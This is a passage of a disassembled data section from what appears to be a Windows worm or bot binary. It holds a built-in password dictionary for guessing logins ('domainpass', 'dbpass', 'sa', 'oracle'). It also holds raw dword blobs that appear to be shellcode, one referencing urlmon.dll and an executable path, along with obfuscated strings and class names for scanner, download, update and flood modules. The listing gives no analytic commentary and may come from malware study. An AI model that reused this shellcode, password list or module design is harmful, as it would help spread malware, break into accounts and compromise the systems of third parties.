		dd offset aMary		; "mary"
		dd offset aLogin	; "login"
		dd offset aLoginpass	; "loginpass"
		dd offset aTechnical	; "technical"
		dd offset aBackup	; "backup"
		dd offset aExchange	; "exchange"
		dd offset aFuck		; "fuck"
		dd offset aBitch	; "bitch"
		dd offset aSlut		; "slut"
		dd offset aSex		; "sex"
		dd offset aGod		; "god"
		dd offset aHell		; "hell"
		dd offset aHello	; "hello"
		dd offset aDomain	; "domain"
		dd offset aDomainpass	; "domainpass"
		dd offset aDomainpassword ; "domainpassword"
		dd offset aDatabase	; "database"
		dd offset aAccess	; "access"
		dd offset aDbpass	; "dbpass"
		dd offset aDbpassword	; "dbpassword"
		dd offset aDatabasepass	; "databasepass"
		dd offset aData		; "data"
		dd offset aDatabasepasswo ; "databasepassword"
		dd offset aDb1		; "db1"
		dd offset aDb2		; "db2"
		dd offset aDb1234	; "db1234"
		dd offset aSa_0		; "sa"
		dd offset aSql		; "sql"
		dd offset aSqlpassoainsta ; "sqlpassoainstall"
		dd offset aOrainstall	; "orainstall"
		dd offset aOracle	; "oracle"
		dd offset aIbm		; "ibm"
		dd offset aCisco	; "cisco"
		dd offset aDell		; "dell"
		dd offset aCompaq	; "compaq"
		dd offset aSiemens	; "siemens"
		dd offset aHp		; "hp"
		dd offset aNokia	; "nokia"
		dd offset aXp		; "xp"
		dd offset aControl	; "control"
		dd offset aOffice	; "office"
		dd offset aBlank	; "blank"
		dd offset aWinpass	; "winpass"
		dd offset aMain		; "main"
		dd offset aLan		; "lan"
		dd offset aInternet_0	; "internet"
		dd offset aIntranet	; "intranet"
		dd offset aStudent	; "student"
		dd offset aTeacher	; "teacher"
		dd offset aStaff	; "staff"
		align 10h
		dd offset aBadAllocatio_4 ; "bad allocation"
		dd offset aBadAllocatio_5 ; "bad allocation"
		dd offset aBadAllocatio_6 ; "bad allocation"
		dd offset aBadAllocatio_7 ; "bad allocation"
		dd offset aBadAllocatio_8 ; "bad allocation"
		dd offset aBadAllocatio_9 ; "bad allocation"
		dd offset aBadAllocati_10 ; "bad allocation"
dword_425A7C	dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
					; DATA XREF: sub_4148F8+7Do
		dd 0F3E2FEEBh, 0
dword_425A98	dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
					; DATA XREF: sub_4148F8+192o
		dd 0F3E2FEEBh, 2 dup(0)
dword_425AB8	dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
					; DATA XREF: sub_414B19+37o
		dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h,	0EB40DA03h
		dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
		dd 38B048Bh, 7275C3C5h,	6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
		dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h,	1C708B0Ch
		dd 8408BADh, 408B09EBh,	7C408D34h, 953C408Bh, 0E4E8EBFh
		dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
		dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h,	0EB525353h
		dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
		dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
		dd 0FFFFh, 0
		dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
		dd 8000h, 80h, 420178h
dword_425BA8	dd 0			; DATA XREF: sub_4172D0+6Er
dword_425BAC	dd 0			; DATA XREF: sub_4172D0+75r
		dd 0
		dd 0FF000000h, 0
		dd 0FFFF0000h, 0
		dd 0FFFFFF00h, 0
		dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
		dd 0FFFFFF00h, 0FFFFFFFFh
dword_425BE8	dd 0			; DATA XREF: sub_4172D0+8Br
dword_425BEC	dd 80000000h		; DATA XREF: sub_4172D0+91r
		dd 0
		dd 800000h, 0
		dd 8000h, 0
		dd 80h,	80000000h, 0
		dd 800000h, 0
		dd 8000h, 0
		dd 80h,	0
		dd offset dword_420178+10h
		dd offset aBadAllocati_11 ; "bad allocation"
		dd 0A0E0FBEBh, 0FEE3E1EDh, 0FCEBFAFBh, 0E3E1EDA3h, 0E5E0E7E2h
		dd 0E3E1EDA0h, 7Ah dup(0)
dword_425E30	dd 80h dup(0)		; DATA XREF: sub_41C28D+44Eo
		dd 0FBEB1309h, 0EFEAA0E0h, 0EDE0E7F8h, 0FBE1FDE7h, 0A0EBEDFCh
		dd 0F4E7ECh, 0FAh dup(0)
		dd 13090000h
dword_426434	dd 0FEFAFAE6h, 0E7A1A1B4h, 0FCEDEBFDh, 0E6FDFAEBh, 0EBFEFEE1h
					; DATA XREF: sub_41AFA7+408o
		dd 0E1EDA0FCh, 0E7FEA1E3h, 0FCFBFAEDh, 0F7A1FDEBh, 0EBA0E3FDh
		dd 0EBF6h
aCxaxsvayjgngjs	db 'cXAXsVAYjgnGjsIt',0 ; DATA XREF: sub_419EC1:loc_419EECo
					; sub_419EC1+44r
		align 4
		dd 1Bh dup(0)
aNn		db '­­ÏÀÛÝ',0           ; DATA XREF: sub_41802D+2A9o
					; sub_41802D+375o ...
		align 4
		dd 3Eh dup(0)
dword_4265E0	dd 0FEEBE7FEh, 0FCEBh, 4 dup(0)	; DATA XREF: sub_41802D+2FFo
					; sub_41802D+38Fo
byte_4265F8	db 2Eh			; DATA XREF: sub_417E66+E4r
byte_4265F9	db 0A3h, 0F6h, 0	; DATA XREF: sub_41802D+3A5o
		dd 0Dh dup(0)
		db 0
byte_426631	db 0A4h, 0CEh, 0EBh	; DATA XREF: sub_41802D+611o
		dd 0FCBEE0FBh, 0E2E0A0h, 0Dh dup(0)
		db 0
byte_426671	db 0F9h, 0E7h, 0E0h	; DATA XREF: sub_401DA7+60o
					; sub_417776+B8o ...
		dd 0FEE2EBE6h, 0EBA0BCBDh, 0EBF6h, 1Ch dup(0)
		db 0
asc_4266F1	db 'ÅËÜÀËÜÀ˽·½',0      ; DATA XREF: sub_41C28D+2FEo
		align 10h
		dd 0Ah dup(0)
		db 0
byte_426729	db 0D9h, 0E7h, 0E0h	; DATA XREF: sub_417776+A4o
					; sub_417909+7Co ...
		dd 0C6AEBCBDh, 0AEFEE2EBh, 0F8FCEBDDh, 0EBEDE7h, 3Ch dup(0)
dword_42682C	dd 8			; DATA XREF: sub_417C7B+174r
					; sub_417C7B+1B1r
word_426830	dw 1D0Dh		; DATA XREF: sub_401E4A:loc_401EFEr
byte_426832	db 1			; DATA XREF: sub_40177B+8Fr
					; sub_4019F3+8Fr
		align 4
		dd offset aBadAllocati_12 ; "bad allocation"
asc_426838	db '»¸¹È½¶½»¶Ï¸º·½È·½¿ÊÊÊÊ˽¹ÈÌ¿¶º¿ËË˽º¶½¶ºº¶¿Ê¾Ê»Ï¶Ë¿¿¼Ëϸ»¹¹¸Ì½º¼¿'
					; DATA XREF: sub_40177B+7Co
		db 'ȺÈÌ·¿¶»Í˸¿¿½¼½ÈÈ˺¿ÍË»¸¾½»Ë½Ê¼È½·Ï½¼ÈÏʽʽ¶¼¿ËºÍ¶Í»ÏËÏ·ÏÍÏ',0
		align 4
		dd 70h dup(0)
asc_426A78	db 'Ì»¿º¸¼»¶½Í·»Èϸ˷ÌËʷʶȺͷ¹¸»Èº»ÊºÏË̸ȹ¶¿½ÌÍÍ˼ȹϹȶÌÍ·¼¶Ìº¹¹Ë'
					; DATA XREF: sub_4019F3+7Co
		db '·½º·»Ê˾Ïʶ¿È¹¸ÍËÏ»»¸È½¿È¶Ï¹»·ËÍ·½Ï¶Í·Ë»»¿»¾½¿·¹½ÍÌ˺»ËÊ̾¸·',0
		align 4
		dd 10h dup(0)
asc_426B38	db 'ÀÇÍÅ',0             ; DATA XREF: sub_41881F+216o
					; sub_418A8C+27o
		align 10h
		db 0
asc_426B41	db 'ÞÏÝÝ',0             ; DATA XREF: sub_41881F+13Eo
		align 4
		db 2 dup(0)
asc_426B4A	db 'ÛÝËÜ',0             ; DATA XREF: sub_41881F+227o
		align 10h
		db 3 dup(0)
asc_426B53	db 'ÞÇÀÉ',0             ; DATA XREF: sub_41802D+1CFo
		dd 0
asc_426B5C	db 'ÞÁÀÉ',0             ; DATA XREF: sub_41802D+22Fo
		align 4
		db 0
asc_426B65	db 'ÅÇÍÅ',0             ; DATA XREF: sub_41802D+1DFo
		align 4
		db 2 dup(0)
asc_426B6E	db 'ÄÁÇÀ',0             ; DATA XREF: sub_41802D+2ECo
					; sub_41802D+355o
		align 4
		db 3 dup(0)
asc_426B77	db 'ÃÁÊË',0             ; DATA XREF: sub_41802D+365o
		align 10h
asc_426B80	db 'ÞÜÇØÃÝÉ',0          ; DATA XREF: sub_417B51+A4o
					; sub_41802D+1EFo
		align 10h
		dd offset aBadAllocati_13 ; "bad allocation"
dword_426B94	dd 5348h, 420568h, 420584h, 420778h, 420788h, 4207BCh
					; DATA XREF: sub_419430+20o
					; sub_419430+8Eo
		dd 4207CCh, 4207E4h
dword_426BB4	dd 80000002h, 80000001h, 420AFCh ; DATA	XREF: sub_41A28F+6Bo
dword_426BC0	dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_41A0C2+3Do
		dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
		dd 9, 7D8AAFA8h, 0F4BE11C9h, 8,	1Dh dup(0)
		dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
		dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
		dd 9, 5EB02EBh,	0FFFFF9E8h, 0FFh, 1Dh dup(0)
		dd 9
off_426ED8	dd offset off_41D39C	; DATA XREF: _1fieagrn:00421014o
					; _1fieagrn:00421034o
		align 10h
a_?avclsmodule@	db '.?AVclsModule@@',0
off_426EF0	dd offset off_41D39C	; DATA XREF: _1fieagrn:0042105Co
					; _1fieagrn:00421084o ...
		align 8
a_?avlength_err	db '.?AVlength_error@std@@',0
		align 10h
off_426F10	dd offset off_41D39C	; DATA XREF: _1fieagrn:004210ACo
					; _1fieagrn:004210D0o ...
		align 8
a_?avlogic_erro	db '.?AVlogic_error@std@@',0
		align 10h
off_426F30	dd offset off_41D39C	; DATA XREF: _1fieagrn:00420F6Co
					; _1fieagrn:0042111Co ...
		align 8
a_?avexception@	db '.?AVexception@std@@',0
off_426F4C	dd offset off_41D39C	; DATA XREF: _1fieagrn:004210F8o
					; _1fieagrn:00421150o ...
		dd 0
a_?avbad_alloc@	db '.?AVbad_alloc@std@@',0
off_426F68	dd offset off_41D39C	; DATA XREF: _1fieagrn:00421178o
					; _1fieagrn:0042119Co
		align 10h
a_?avmdlupd@@	db '.?AVmdlUPD@@',0
		align 10h
off_426F80	dd offset off_41D39C	; DATA XREF: _1fieagrn:004211C4o
					; _1fieagrn:004211E8o
		align 8
a_?avmdldl@@	db '.?AVmdlDL@@',0
off_426F94	dd offset off_41D39C	; DATA XREF: _1fieagrn:00421210o
					; _1fieagrn:00421234o
		dd 0
a_?avmdlipt@@	db '.?AVmdlIPT@@',0
		align 4
off_426FAC	dd offset off_41D39C	; DATA XREF: _1fieagrn:0042125Co
					; _1fieagrn:00421280o
		dd 0
a_?avmdlijn@@	db '.?AVmdlIJN@@',0
		align 4
off_426FC4	dd offset off_41D39C	; DATA XREF: _1fieagrn:004212A8o
					; _1fieagrn:004212CCo
		dd 0
a_?avmdliquit@@	db '.?AVmdlIQUIT@@',0
		align 4
off_426FDC	dd offset off_41D39C	; DATA XREF: _1fieagrn:004212F4o
					; _1fieagrn:00421318o
		dd 0
a_?avmdlhttpinf	db '.?AVmdlHTTPInfo@@',0
		align 4
off_426FF8	dd offset off_41D39C	; DATA XREF: _1fieagrn:00421340o
					; _1fieagrn:00421364o
		align 10h
a_?avmdls4stop@	db '.?AVmdlS4Stop@@',0
off_427010	dd offset off_41D39C	; DATA XREF: _1fieagrn:0042138Co
					; _1fieagrn:004213B0o
		align 8
a_?avmdls4@@	db '.?AVmdlS4@@',0
off_427024	dd offset off_41D39C	; DATA XREF: _1fieagrn:004213D8o
					; _1fieagrn:004213FCo
		dd 0
a_?avmdlnetinfo	db '.?AVmdlNetInfo@@',0
		align 10h
off_427040	dd offset off_41D39C	; DATA XREF: _1fieagrn:00421424o
					; _1fieagrn:00421448o
		align 8
a_?avmdlsysinfo	db '.?AVmdlSysInfo@@',0
		align 4
off_42705C	dd offset off_41D39C	; DATA XREF: _1fieagrn:00421470o
					; _1fieagrn:00421494o
		dd 0
a_?avmdlscansta	db '.?AVmdlScanStats@@',0
		align 4
off_427078	dd offset off_41D39C	; DATA XREF: _1fieagrn:004214BCo
					; _1fieagrn:004214E0o
		align 10h
a_?avmdlscansto	db '.?AVmdlScanStop@@',0
		align 4
off_427094	dd offset off_41D39C	; DATA XREF: _1fieagrn:00421508o
					; _1fieagrn:0042152Co
		dd 0
a_?avmdlscanner	db '.?AVmdlScanner@@',0
		align 10h
		dd 4 dup(0)
dword_4270C0	dd 0			; DATA XREF: sub_4031F3+4w
					; sub_4032F9+3r
dword_4270C4	dd 0			; DATA XREF: sub_40340B+2Bo
					; .text:loc_41CD31w ...
		align 10h
dword_4270D0	dd 0			; DATA XREF: sub_40340B:loc_40342Fr
					; sub_40340B+32w
dword_4270D4	dd 0			; DATA XREF: sub_4044D2-C3w
					; sub_40AF90:loc_40AFA2r ...
		dd 0
dword_4270DC	dd 0			; DATA XREF: sub_40428Dr
					; sub_40FA72+15r ...
dword_4270E0	dd 0			; DATA XREF: sub_404A3E+8Fw
					; _1fieagrn:off_41D408o
dword_4270E4	dd 0			; DATA XREF: sub_404A3E+99w
		dd 0
dword_4270EC	dd 0			; DATA XREF: sub_404A3E+8Aw
		dd 10h dup(0)
dword_427130	dd 0			; DATA XREF: sub_404A3E+BFw
					; sub_404A3E+DFr
		align 8
dword_427138	dd 0			; DATA XREF: sub_404A3E+7Bw
					; _1fieagrn:0041D40Co
		dd 22h dup(0)
word_4271C4	dw 0			; DATA XREF: sub_404A3E+4Fw
		align 4
word_4271C8	dw 0			; DATA XREF: sub_404A3E+48w
		align 4
word_4271CC	dw 0			; DATA XREF: sub_404A3E+41w
		align 10h
word_4271D0	dw 0			; DATA XREF: sub_404A3E+3Aw
		align 4
dword_4271D4	dd 0			; DATA XREF: sub_404A3E+26w
dword_4271D8	dd 0			; DATA XREF: sub_404A3E+20w
dword_4271DC	dd 0			; DATA XREF: sub_404A3E+1Aw
dword_4271E0	dd 0			; DATA XREF: sub_404A3E+14w
dword_4271E4	dd 0			; DATA XREF: sub_404A3E+Ew
dword_4271E8	dd 0			; DATA XREF: sub_404A3E+9w
dword_4271EC	dd 0			; DATA XREF: sub_404A3E+60w
dword_4271F0	dd 0			; DATA XREF: sub_404A3E+68w
					; sub_404A3E+85r
word_4271F4	dw 0			; DATA XREF: sub_404A3E+33w
		align 4
dword_4271F8	dd 0			; DATA XREF: sub_404A3E+57w
dword_4271FC	dd 0			; DATA XREF: sub_404A3E+70w
word_427200	dw 0			; DATA XREF: sub_404A3E+2Cw
		align 4
		dd 80h dup(0)
dword_427404	dd 0			; DATA XREF: sub_404DF4+15w
					; sub_404DF4+1Dw ...
word_427408	dw 0			; DATA XREF: sub_405019+E7w
		align 4
		dd 2 dup(0)
dword_427414	dd 4E4h			; DATA XREF: sub_405019+C3w
dword_427418	dd 0			; DATA XREF: sub_405019+CBw
dword_42741C	dd 0			; DATA XREF: sub_405019+D3w
dword_427420	dd 0			; DATA XREF: sub_402C69+6r
					; sub_402DA9+6r ...
		dd 8 dup(0)
off_427444	dd offset sub_4055A6	; DATA XREF: sub_405886+30w
					; sub_405886+51r ...
off_427448	dd offset sub_43A1C4	; DATA XREF: sub_4055AF+10r
					; sub_405886+3Dw ...
off_42744C	dd offset sub_443F4D	; DATA XREF: sub_4056CA+44r
					; sub_405886+4Aw ...
off_427450	dd offset sub_4540F9	; DATA XREF: sub_4055D9+Br
					; sub_405886+5Ew ...
		align 8
dword_427458	dd 15CB48h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: sub_405C31+4o
					; .data:off_423800o
dword_427470	dd 15D2B8h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00423808o
dword_427488	dd 15BF70h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00423818o
		dd 15C758h, 0FFFFFFFFh,	4 dup(0)
dword_4274B8	dd 15B390h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00423830o
		dd 15BF28h, 0FFFFFFFFh,	4 dup(0)
		dd 15D448h, 0FFFFFFFFh,	4 dup(0)
dword_427500	dd 15D470h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00423850o
dword_427518	dd 15D498h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00423860o
		dd 15D4C0h, 0FFFFFFFFh,	4 dup(0)
		dd 15D4E8h, 0FFFFFFFFh,	4 dup(0)
dword_427560	dd 15D510h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00423880o
		dd 15D538h, 0FFFFFFFFh,	4 dup(0)
		dd 15D560h, 0FFFFFFFFh,	4 dup(0)
dword_4275A8	dd 0A20000h		; DATA XREF: sub_402E05+7Cr
					; sub_4039C3+62r ...
dword_4275AC	dd 0			; DATA XREF: sub_405E8D+21w
					; sub_405F00+21Cr ...
dword_4275B0	dd 0			; DATA XREF: sub_407AEA+14r
					; sub_407AEA+29r ...
dword_4275B4	dd 0			; DATA XREF: sub_40E422+19Er
dword_4275B8	dd 2			; DATA XREF: sub_4044D2-138w
					; sub_407CB6:loc_407CDEr ...
dword_4275BC	dd 0A28h		; DATA XREF: sub_4044D2-121w
dword_4275C0	dd 501h			; DATA XREF: sub_4044D2-132w
dword_4275C4	dd 5			; DATA XREF: sub_4044D2-12Dw
					; sub_407CED+30r
dword_4275C8	dd 1			; DATA XREF: sub_4044D2-127w
dword_4275CC	dd 1			; DATA XREF: sub_40B203+A2w
dword_4275D0	dd 0A22BA8h		; DATA XREF: sub_40B203+A7w
		align 8
dword_4275D8	dd 0A22BC8h		; DATA XREF: sub_40AF90+4Bw
					; sub_40AF90:loc_40B055r ...
		dd 3 dup(0)
off_4275E8	dd offset aCM_unpackerPac ; DATA XREF: sub_40B203+37w
					; "C:\\m_unpacker\\packed.exe"
		align 10h
byte_4275F0	db 0			; DATA XREF: sub_407DBB+2Cw
					; sub_4084EB+5r
		align 4
dword_4275F4	dd 0			; DATA XREF: sub_407DBB+23w
dword_4275F8	dd 0			; DATA XREF: sub_407DBB+1Br
					; sub_407DBB+A0w
dword_4275FC	dd 0			; DATA XREF: sub_408305+27o
dword_427600	dd 0			; DATA XREF: sub_408305+22r
dword_427604	dd 0			; DATA XREF: sub_408408+4w sub_408412r
dword_427608	dd 2			; DATA XREF: sub_4085AF+280w
					; sub_408ACB:loc_408B01w ...
		dd 3 dup(0)
dword_427618	dd 6 dup(0)		; DATA XREF: sub_409E64+66o
		db 0
byte_427631	db 3 dup(0)		; DATA XREF: sub_409E64+8Ao
		dd 40h dup(0)
		db 0
byte_427735	db 0			; DATA XREF: sub_409E64+92w
		align 4
		dd 7Dh dup(0)
dword_42792C	dd 0			; DATA XREF: sub_403AA0+80r
					; sub_409E64+E3o ...
dword_427930	dd 0			; DATA XREF: sub_40AA2F+8r
		align 8
aCM_unpackerPac	db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40B203+1Do
					; .data:off_4275E8o
		align 4
		dd 3Ah dup(0)
byte_427A3C	db 0			; DATA XREF: sub_40B203+24w
		align 10h
dword_427A40	dd 1			; DATA XREF: sub_40B2BC+2r
					; sub_40B2BC+24w ...
dword_427A44	dd 77C26E79h		; DATA XREF: sub_40B4CD+43r
					; sub_40B539+11w ...
byte_427A48	db 1			; DATA XREF: sub_40B4CD:loc_40B506r
					; sub_40B539+17w ...
		align 4
off_427A4C	dd offset sub_40C208	; DATA XREF: sub_40C254+Cr
					; sub_40C28B+Bw
dword_427A50	dd 1			; DATA XREF: sub_40C307+14r
					; sub_40C307+3Aw ...
dword_427A54	dd 1			; DATA XREF: sub_40C6EC+Fr
					; sub_40C6EC+37w ...
dword_427A58	dd 0			; DATA XREF: .data:off_423F3Co
					; .data:off_423F40o ...
dword_427A5C	dd 77E7C706h		; DATA XREF: sub_40CEAA+4w
					; sub_40CEC4+11r ...
dword_427A60	dd 0			; DATA XREF: sub_40D96D+Ar
dword_427A64	dd 0			; DATA XREF: sub_40E07F+4w
					; sub_40E0D9:loc_40E122o ...
dword_427A68	dd 0			; DATA XREF: sub_40E07F+9w
					; sub_40E0D9:loc_40E178o ...
dword_427A6C	dd 0			; DATA XREF: sub_40E07F+Ew sub_40E0CCr ...
dword_427A70	dd 0			; DATA XREF: sub_40E07F+13w
					; sub_40E0D9:loc_40E184o ...
		align 8
dword_427A78	dd 0			; DATA XREF: sub_40E289+4w
		dd 2 dup(0)
dword_427A84	dd 0			; DATA XREF: sub_40E293+4w
		dd 0Fh dup(0)
dword_427AC4	dd 0			; DATA XREF: sub_4085AF+6r
dword_427AC8	dd 0			; DATA XREF: sub_40F8D4+10r
					; sub_40F8D4+60w ...
dword_427ACC	dd 0			; DATA XREF: sub_40F8D4+75w
					; sub_40F8D4:loc_40FA22r
dword_427AD0	dd 0			; DATA XREF: sub_40F8D4+82w
					; sub_40F8D4+167r
dword_427AD4	dd 0			; DATA XREF: sub_40F8D4+D0w
					; sub_40F8D4:loc_40F9A9r
dword_427AD8	dd 0			; DATA XREF: sub_40F8D4+BAw
					; sub_40F8D4+E1r ...
		align 10h
dword_427AE0	dd 0			; DATA XREF: sub_40FB1C+Fw
		dd 2Fh dup(0)
dword_427BA0	dd 0			; DATA XREF: sub_410C39:loc_410C61r
byte_427BA4	db 0			; DATA XREF: sub_410E04:loc_410F40r
		align 4
dword_427BA8	dd 0			; DATA XREF: sub_41A200+4Br
					; sub_41A690+E6w ...
dword_427BAC	dd 0			; DATA XREF: sub_41A138+14r
					; sub_41A19C+14r ...
dword_427BB0	dd 0			; DATA XREF: sub_41A0C2+1Dr
					; sub_41A690+136w ...
dword_427BB4	dd 0			; DATA XREF: sub_41A200+1Cr
					; sub_41A690+AAw ...
dword_427BB8	dd 0			; DATA XREF: sub_41A690+BEw
					; sub_41A690+16Dr ...
dword_427BBC	dd 0			; DATA XREF: sub_41A690+D2w
					; sub_41A690+179r ...
dword_427BC0	dd 0			; DATA XREF: sub_41A138+34r
					; sub_41A19C+34r ...
dword_427BC4	dd 0			; DATA XREF: sub_41A200+63r
					; sub_41A690+FAw ...
dword_427BC8	dd 0			; DATA XREF: sub_41A690+14Aw
					; sub_41A690+322r
dword_427BCC	dd 0			; DATA XREF: sub_41A690+96w
					; sub_41A690+155r ...
dword_427BD0	dd 0			; DATA XREF: sub_41A138+4Dr
					; sub_41A19C+4Dr ...
dword_427BD4	dd 0			; DATA XREF: sub_401DA7+6Dr
					; sub_41930F+A9w ...
dword_427BD8	dd 0			; DATA XREF: sub_40207A+14Fr
					; sub_417C7B+11Dr ...
dword_427BDC	dd 0			; DATA XREF: sub_40207A+149r
					; sub_417C7B+116r ...
dword_427BE0	dd 0			; DATA XREF: sub_40207A+143r
					; sub_419590+61w
dword_427BE4	dd 0			; DATA XREF: sub_40207A+13Dr
					; sub_419590+66w
dword_427BE8	dd 0			; DATA XREF: sub_40207A+137r
					; sub_419590+71w
dword_427BEC	dd 0			; DATA XREF: sub_40207A+12Ar
					; sub_419590+76w
dword_427BF0	dd 0			; DATA XREF: sub_41954Ar
					; sub_41954A:loc_41957Fw ...
dword_427BF4	dd 0			; DATA XREF: sub_41954A+5r
					; sub_41954A+3Bw ...
dword_427BF8	dd 0			; DATA XREF: sub_41954A+15r
					; sub_419AEB+20w ...
dword_427BFC	dd 0			; DATA XREF: sub_419AEB+25w
		dd 33h dup(0)
dword_427CCC	dd 2 dup(0)		; DATA XREF: sub_419AEB+43o
word_427CD4	dw 0			; DATA XREF: sub_418B4D+8o
					; sub_41930F+AEw ...
word_427CD6	dw 0			; DATA XREF: sub_41930F+D1w
dword_427CD8	dd 0			; DATA XREF: sub_41930F+BDw
		dd 2 dup(0)
dword_427CE4	dd 0			; DATA XREF: sub_419430+6r
					; sub_419430+73r ...
dword_427CE8	dd 41h dup(0)		; DATA XREF: sub_418D42+1EDo
					; sub_418D42+224o ...
dword_427DEC	dd 0			; DATA XREF: sub_418B4D+Dr
					; sub_41930F+84w ...
byte_427DF0	db 0			; DATA XREF: sub_418D42+293o
					; sub_418D42+477o ...
		align 4
		dd 40h dup(0)
byte_427EF4	db 0			; DATA XREF: sub_4022D6:loc_40233Dr
					; sub_41930F+117w ...
		align 4
dword_427EF8	dd 41h dup(0)		; DATA XREF: sub_418D42:loc_418F5Fo
					; sub_41930F+1Ao
dword_427FFC	dd 0			; DATA XREF: sub_40177B+263o
					; sub_4019F3+215o ...
byte_428000	db 0			; DATA XREF: sub_413DDD+53Dr
					; sub_418AF1:loc_418B21r ...
		align 4
		dd 8 dup(0)
dword_428024	dd 0			; DATA XREF: sub_41BB83+33w
					; sub_41BB83+8Fr ...
dword_428028	dd 40h dup(0)		; DATA XREF: sub_41B981+49o
					; sub_41BD26+21o
dword_428128	dd 0			; DATA XREF: sub_401FD7+Br
					; sub_4145BE+75w ...
		align 10h
byte_428130	db 0			; DATA XREF: sub_40207A+16Bo
					; sub_41AD77+D7o ...
		align 4
		dd 3Fh dup(0)
dword_428230	dd 0			; DATA XREF: sub_40207A+170r
					; sub_41AD77+45o
dword_428234	dd 0			; DATA XREF: sub_40207A+17Er
					; sub_41AD77:loc_41AF02w ...
byte_428238	db 0			; DATA XREF: sub_4022D6+4B7w
		align 4
		dd 3Fh dup(0)
dword_428338	dd 0			; DATA XREF: sub_4022D6+44Ar
					; sub_4022D6+483w
		dd 3 dup(0)
		db 0
byte_428349	db 0			; DATA XREF: sub_4022D6:loc_40245Cr
					; sub_4027F4+AFw
		align 4
		dd 3 dup(0)
dword_428358	dd 0			; DATA XREF: sub_4027F4:loc_40287Dr
		dd 1F3Dh dup(0)
dword_430050	dd 13CEh dup(0)		; DATA XREF: _1fieagrn:0041EFBCo
					; _1fieagrn:0041EFD8o
dword_434F88	dd 0			; DATA XREF: sub_4028D4+A6r
					; sub_418D42+501r ...
		db 0
byte_434F8D	db 0			; DATA XREF: sub_4022D6+3Er
					; sub_41BB83:loc_41BBBFw ...
		align 10h
dword_434F90	dd 0			; DATA XREF: sub_41BB83+13Bw
dword_434F94	dd 0			; DATA XREF: sub_4028D4+90r
					; sub_41B981:loc_41BAEFw ...
word_434F98	dw 0			; DATA XREF: sub_401E4A+A6w
					; sub_401E4A+BAw
		align 10h
byte_434FA0	db 0			; DATA XREF: sub_4148F8+9Fr
					; sub_4148F8+1B4r ...
		align 4
		dd 31h dup(0)
		db 2 dup(0)
word_43506A	dw 0			; DATA XREF: sub_414B19+56o
		dd 2Bh dup(0)
byte_435118	db 0			; DATA XREF: sub_4148F8:loc_414953o
					; sub_4148F8:loc_4149C4r ...
		db 2 dup(0)
byte_43511B	db 0			; DATA XREF: sub_4148F8+119w
		dd 2 dup(0)
		db 2 dup(0)
byte_435126	db 0			; DATA XREF: sub_4148F8+8Ew
					; sub_4148F8+1A3w
		align 4
		db 2 dup(0)
byte_43512A	db 0			; DATA XREF: sub_4148F8+94w
					; sub_4148F8+1A9w
		align 10h
byte_435130	db 0			; DATA XREF: sub_4148F8+A7w
					; sub_4148F8+BFw ...
		align 4
		dd 56h dup(0)
dword_43528C	dd 0			; DATA XREF: sub_417E66+110o
					; sub_41C22E+43o ...
dword_435290	dd 0A23990h		; DATA XREF: sub_417E66+109r
					; sub_417E66+122r ...
dword_435294	dd 0Dh			; DATA XREF: sub_40121E+20r
					; sub_40121E:loc_40127Bw ...
dword_435298	dd 0			; DATA XREF: sub_401E4A+D3o
					; sub_401FD7+22o ...
dword_43529C	dd 0A23AA8h		; DATA XREF: sub_401E4A+C8r
					; sub_401E4A:loc_401F2Ar ...
dword_4352A0	dd 0			; DATA XREF: sub_4016BA+20r
					; sub_4016BA:loc_401717w ...
off_4352A4	dd offset off_420B9C	; DATA XREF: .text:0041CB47o
					; .text:0041CB51w
off_4352A8	dd offset off_420B94	; DATA XREF: .text:0041CB2Bo
					; .text:0041CB35w
off_4352AC	dd offset off_420C18	; DATA XREF: .text:0041CB7Fo
					; .text:0041CB89w
off_4352B0	dd offset off_420C20	; DATA XREF: .text:0041CB9Bo
					; .text:0041CBA5w
off_4352B4	dd offset off_420C10	; DATA XREF: .text:0041CB63o
					; .text:0041CB6Dw
off_4352B8	dd offset off_420C38	; DATA XREF: .text:0041CBB7o
					; .text:0041CBC1w
off_4352BC	dd offset off_420C8C	; DATA XREF: .text:0041CBEFo
					; .text:0041CBF9w
off_4352C0	dd offset off_420C84	; DATA XREF: .text:0041CBD3o
					; .text:0041CBDDw
off_4352C4	dd offset off_420D4C	; DATA XREF: .text:0041CC0Bo
					; .text:0041CC15w
off_4352C8	dd offset off_420D54	; DATA XREF: .text:0041CC27o
					; .text:0041CC31w
dword_4352CC	dd 2080Ah		; DATA XREF: sub_41AFA7+4E5r
					; .text:0041CC45w
off_4352D0	dd offset off_420EAC	; DATA XREF: .text:0041CC6Do
					; .text:0041CC77w
off_4352D4	dd offset off_420EB4	; DATA XREF: .text:0041CC89o
					; .text:0041CC93w
off_4352D8	dd offset off_420EA4	; DATA XREF: .text:0041CC51o
					; .text:0041CC5Bw
